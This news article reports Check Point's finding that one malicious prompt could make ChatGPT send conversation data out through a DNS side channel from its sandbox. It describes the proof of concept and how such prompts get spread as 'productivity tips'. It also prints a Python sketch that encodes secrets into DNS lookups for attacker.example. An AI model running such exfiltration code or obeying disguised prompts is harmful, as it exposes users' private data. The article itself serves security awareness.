Cybersecurity

ChatGPT Security Issue Enabled Data Theft via Single Prompt

By primereports, March 31, 2026


A security vulnerability in ChatGPT could be exploited with a single malicious prompt to covertly exfiltrate sensitive data from users' prompts and messages.

The security issue, which enabled data exfiltration and remote code execution, was discovered by cybersecurity researchers at Check Point, who warned it could put user privacy at risk.

“A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content,” Check Point said in a blog post published on March 30.

A security update for ChatGPT was deployed on February 20 after researchers reported the issue to OpenAI.

Prior to the fix, a hidden outbound communication path from ChatGPT’s isolated execution runtime to the public internet could have put users at risk of having their messages and prompts exposed.

Many people have become accustomed to using ChatGPT and other AI assistants to manage tasks at work more efficiently, including tasks that involve sensitive corporate data such as account details and private records.

LLMs are also being used to discuss personal issues, such as users' health, finances or mental wellbeing.

Users expect this information to remain within the system, protected from exfiltration by appropriate guardrails. However, Check Point found that it was possible to bypass these protections.

“We found that a single malicious prompt could activate a hidden exfiltration channel inside a regular ChatGPT conversation,” said researchers.

The vulnerability allowed for information to be transmitted to an external server through a DNS side channel originating from the container used by ChatGPT.

Key to the issue was that the model operated under the assumption that this environment was not designed to send data outward, so when the model was prompted to send data, it had no mechanism to mediate or resist the request.

An attacker could take advantage of this by using such a prompt to direct ChatGPT to send the information exchanged with the model to an external server under the attacker's control.
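Check Point's post does not publish exploit code, but the general technique of DNS-based exfiltration is well documented: data is encoded into the hostname of a DNS lookup, so that even a sandbox that blocks direct HTTP egress leaks the payload to whoever operates the authoritative nameserver for the queried domain. The sketch below is a hypothetical illustration of that encoding step only; the domain `attacker.example`, the chunk size, and the function names are illustrative assumptions, not details from the report.

```python
import binascii

def encode_for_dns(secret: str, domain: str = "attacker.example") -> list[str]:
    """Hex-encode a secret and split it into DNS-label-sized hostnames.

    Resolving each returned name (e.g. via socket.getaddrinfo) would carry
    one chunk of the payload to the nameserver for `domain` inside the
    query itself, even if the lookup ultimately fails.
    """
    hex_payload = binascii.hexlify(secret.encode()).decode()
    # DNS labels are capped at 63 octets; 60 stays safely under the limit.
    chunks = [hex_payload[i:i + 60] for i in range(0, len(hex_payload), 60)]
    # Prefix each chunk with a sequence number so the receiver can reorder.
    return [f"{i}.{chunk}.{domain}" for i, chunk in enumerate(chunks)]

names = encode_for_dns("patient: Jane Doe")
```

The receiving side simply logs incoming queries, strips the domain suffix, reorders by the sequence label, and hex-decodes, which is why egress monitoring of DNS traffic is a common mitigation for sandboxed environments.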

Third-Party Access to Private Prompts

In a proof-of-concept, Check Point uploaded a PDF containing laboratory test results, including personal information such as a patient's name, and used the malicious prompt to exploit the vulnerability.

When asked if the information had been sent to a third party, ChatGPT responded that it had not, seemingly unaware that its actions had caused a server operated by the attacker to receive highly sensitive data extracted from the conversation.

The vulnerability relied on the user entering the prompt themselves. The researchers pointed out that there are multiple ways to trick users into doing so, for example by listing the malicious prompt on a website or social media thread about top productivity prompts or other terms people may search for.

“For many users, copying and pasting such prompts into a new conversation is routine and does not appear risky,” said researchers.

“A malicious prompt distributed in that format could therefore be presented as a harmless productivity aid and interpreted as just another useful trick for getting better results from the assistant.”

While it is unknown whether this vulnerability was exploited in the wild, Check Point researchers warned that as AI assistants like ChatGPT increasingly operate in environments that may involve sensitive data, security must be a priority.

“As AI tools become more powerful and widely used, security must remain a central consideration. These systems offer enormous benefits, but adopting them safely requires careful attention to every layer of the platform,” the blog post concluded.

Infosecurity has contacted OpenAI for comment.

Image credit: Anton Dzhumelia / Shutterstock.com
